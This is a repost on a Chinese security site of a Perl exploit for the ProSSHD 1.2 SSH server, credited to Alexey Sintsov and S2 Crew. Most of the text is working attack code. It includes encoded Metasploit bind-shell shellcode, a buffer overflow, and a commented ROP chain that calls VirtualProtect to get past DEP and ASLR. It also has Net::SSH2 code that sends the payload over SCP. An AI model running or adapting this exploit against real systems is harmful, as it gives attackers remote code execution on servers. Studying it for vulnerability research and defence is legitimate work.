首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
来源:www.xakep.ru 作者:Sintsov 发布时间:2010-05-04  

# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :

################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on:  ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine  [www.xakep.ru]
#
#
# CVE: -
 
#!/usr/bin/perl
 
use Net::SSH2;
 
$username = '';
$password = '';
 
$host = '192.168.126.129';  #Remote host
#$host = '192.168.13.6';
$port = 22;
 

# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
$shell =
"\xba\xda\x29\x13\xda\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x56\x31\x50\x13\x83\xc0\x04\x03\x50\xd5\xcb\xe6\x26" .
"\x01\x82\x09\xd7\xd1\xf5\x80\x32\xe0\x27\xf6\x37\x50\xf8" .
"\x7c\x15\x58\x73\xd0\x8e\xeb\xf1\xfd\xa1\x5c\xbf\xdb\x8c" .
"\x5d\x71\xe4\x43\x9d\x13\x98\x99\xf1\xf3\xa1\x51\x04\xf5" .
"\xe6\x8c\xe6\xa7\xbf\xdb\x54\x58\xcb\x9e\x64\x59\x1b\x95" .
"\xd4\x21\x1e\x6a\xa0\x9b\x21\xbb\x18\x97\x6a\x23\x13\xff" .
"\x4a\x52\xf0\xe3\xb7\x1d\x7d\xd7\x4c\x9c\x57\x29\xac\xae" .
"\x97\xe6\x93\x1e\x1a\xf6\xd4\x99\xc4\x8d\x2e\xda\x79\x96" .
"\xf4\xa0\xa5\x13\xe9\x03\x2e\x83\xc9\xb2\xe3\x52\x99\xb9" .
"\x48\x10\xc5\xdd\x4f\xf5\x7d\xd9\xc4\xf8\x51\x6b\x9e\xde" .
"\x75\x37\x45\x7e\x2f\x9d\x28\x7f\x2f\x79\x95\x25\x3b\x68" .
"\xc2\x5c\x66\xe5\x27\x53\x99\xf5\x2f\xe4\xea\xc7\xf0\x5e" .
"\x65\x64\x79\x79\x72\x8b\x50\x3d\xec\x72\x5a\x3e\x24\xb1" .
"\x0e\x6e\x5e\x10\x2e\xe5\x9e\x9d\xfb\xaa\xce\x31\x53\x0b" .
"\xbf\xf1\x03\xe3\xd5\xfd\x7c\x13\xd6\xd7\x0b\x13\x18\x03" .
"\x58\xf4\x59\xb3\x4f\x58\xd7\x55\x05\x70\xb1\xce\xb1\xb2" .
"\xe6\xc6\x26\xcc\xcc\x7a\xff\x5a\x58\x95\xc7\x65\x59\xb3" .
"\x64\xc9\xf1\x54\xfe\x01\xc6\x45\x01\x0c\x6e\x0f\x3a\xc7" .
"\xe4\x61\x89\x79\xf8\xab\x79\x19\x6b\x30\x79\x54\x90\xef" .
"\x2e\x31\x66\xe6\xba\xaf\xd1\x50\xd8\x2d\x87\x9b\x58\xea" .
"\x74\x25\x61\x7f\xc0\x01\x71\xb9\xc9\x0d\x25\x15\x9c\xdb" .
"\x93\xd3\x76\xaa\x4d\x8a\x25\x64\x19\x4b\x06\xb7\x5f\x54" .
"\x43\x41\xbf\xe5\x3a\x14\xc0\xca\xaa\x90\xb9\x36\x4b\x5e" .
"\x10\xf3\x7b\x15\x38\x52\x14\xf0\xa9\xe6\x79\x03\x04\x24" .
"\x84\x80\xac\xd5\x73\x98\xc5\xd0\x38\x1e\x36\xa9\x51\xcb" .
"\x38\x1e\x51\xde";


 
$fuzz = "\x41"x491 .  # buffer before RET addr rewriting

###############################   ROP  
# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL  
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this make stack executable:

#### RET rewrite###
"\x9F\x07\x37\x7C".  # MOV EAX, EDI / POP EDI / POP ESI / RETN  ; EAX points on our stack data with some offset

"\x11\x11\x11\x11".  # JUNK---------------^^^       ^^^ 
"\x22\x22\x22\x22".  # JUNK-------------------------^^^
"\x27\x34\x34\x7C".  # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33".  # JUNK------------------------------^^^

"\xC1\x4C\x34\x7C".  # POP EAX  / RETN
                     #     ^^^
"\x33\x33\x33\x33".  #     ^^^
"\x33\x33\x33\x33".  #     ^^^
"\x33\x33\x33\x33".  #     ^^^
"\x33\x33\x33\x33".  #     ^^^
                     #     ^^^
"\xC0\xFF\xFF\xFF".  # ----^^^  Param for next instruction...
"\x05\x1e\x35\x7C".  # NEG EAX /  RETN     ; EAX will be 0x40 (param for VirtualProtect)

"\xc8\x03\x35\x7C".  # MOV DS:[ECX], EAX / RETN    ; save 0x40 (3 param)
"\x40\xa0\x35\x7C".  # MOV EAX, ECX / RETN     ; restore pointer in EAX

"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN             ; Change position
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN      
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN    ; EAX=ECX-0x0c

"\x08\x94\x16\x7C".  # MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)

"\xB9\x1F\x34\x7C".  # INC EAX / RETN    ; oh ... and move pointer back
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN    ; EAX=ECX=0x8

"\xB2\x01\x15\x7C".  # MOV [EAX+0x4], 1   ; size for VirtualProtect (2 param)

"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN             ; Change position for output from VirtualProtect
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN      
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN
"\xA1\x1D\x34\x7C".  # DEC EAX  / RETN

"\x27\x34\x34\x7C".  # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33".  # JUNK------------------------------^^^

"\x40\xa0\x35\x7C".  # MOV EAX, ECX / RETN     ; restore pointer in EAX
                     #     
"\x33\x33\x33\x33".  #    
"\x33\x33\x33\x33".  #    
"\x33\x33\x33\x33".  #    
"\x33\x33\x33\x33".  #    

"\xB9\x1F\x34\x7C".  # INC EAX / RETN      ; and again...
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN
"\xB9\x1F\x34\x7C".  # INC EAX / RETN

"\xE5\x6B\x36\x7C".   # MOV DS:[EAX+0x14], ECX             ; save output addr for VirtualProtect (4 param)

"\xBA\x1F\x34\x7C"x204 . # RETN fill.....

"\xDD\x28\x35\x7C".  # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN  ;Call VirtualProtect
"AAAABBBBCCCCDDDD".   # Here is place for params (VirtualProtect)

####################### retrun into stack after VirtualProtect
"\x1A\xF2\x35\x7C".   # ADD ESP, 0xC / RETN                        ; take next ret
"XXXYYYZZZ123".       # trash
"\x30\x5C\x34\x7C".   # 0x7c345c2e: ANDPS XMM0, XMM3  -- (+0x2 to address and....)  --> PUSH ESP / RETN ; EIP=ESP

"\x90"x14 .           # NOPs here is the begining of shellcode

$shell;        # shellcode 8)
 
 
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
#sleep(10);
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();

 
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Winamp v5.572 0day Local Crash
·All Browsers - Long Unicode Do
·Firefox 3.6.3 Fork Bomb DoS
·RealVNC VNC Server Free Editio
·All browsers 0day Crash Exploi
·Knowledge Root version 0.9.9.5
·JavaScriptCore.dll Stack Exhau
·PHP-Nuke 7.0/8.1/8.1.35 Wormab
·TFTPGUI v1.4.5 Long Transport
·Internet Explorer 8.0 Denial o
·Acritum Femitter Server v1.03
·PhotoFiltre Studio X .tif file
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved